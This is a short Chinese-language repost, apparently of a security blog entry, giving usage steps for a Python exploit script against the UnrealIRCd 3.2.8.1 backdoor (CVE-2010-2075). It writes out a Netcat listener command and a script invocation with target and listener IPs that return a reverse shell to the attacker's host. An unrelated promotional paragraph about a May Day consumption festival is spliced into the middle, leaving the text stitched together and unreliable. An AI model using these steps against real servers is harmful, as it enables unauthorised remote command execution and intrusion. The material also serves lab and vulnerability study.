Python 3 中的 UnrealIRCd 3.2.8.1 后门命令执行漏洞 (CVE-2010-2075)

Python 3 中的 UnrealIRCd 3.2.8.1 后门命令执行漏洞 (CVE-2010-2075)
2023-4-26 09:44:2 Author: Ots安全(查看原文) 阅读量:22 收藏

Python 3 中的 UnrealIRCd 3.2.8.1 后门命令执行漏洞 (CVE-2010-2075)。

UnrealIRCd版本 3.2.8.1 包含允许远程攻击者执行任意命令的特洛伊木马 ( CVE-2010-2075 )。

我引用了 Metasploit 负载payload/cmd/unix/reverse_perl来制作这个脚本。

在监听主机上启动 Netcat 监听器：

nc -lp 4444

执行脚本，提供以下位置参数：

python3 script.py <target> <tport> <listener> <lport>

<target>目标主机 IP 地址。
<tport>目标主机端口号。
<listener>侦听主机 IP 地址。
<lport>侦听主机端口号。

在本地机器上设置 Netcat 侦听器：

nc -lp 4444

192.168.1.3在TCP 端口针对目标机器运行脚本6697：

python3 script.py 192.168.1.3 6697 192.168.1.2 4444

等一下，Netcat 侦听器应该会收到一个反向 shell。

（五一）夏季消费节

国际劳动节又称“五一国际劳动节”“国际示威游行日”（英语：International Workers' Day，May Day），是世界上80多个国家的全国性节日。定在每年的五月一日。它是全世界劳动人民共同拥有的节日" 夏日消费节 ",进一步促进消费,助力实体。

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247497407&idx=2&sn=ad227b3a0d1b2e17dd84993bdf8ba968&chksm=9badbff4acda36e2342a18c3b35c2a73ab920d7fd63a157ace34a88d74fc6ca0ce7b34000f41#rd
如有侵权请联系:admin#unsafe.sh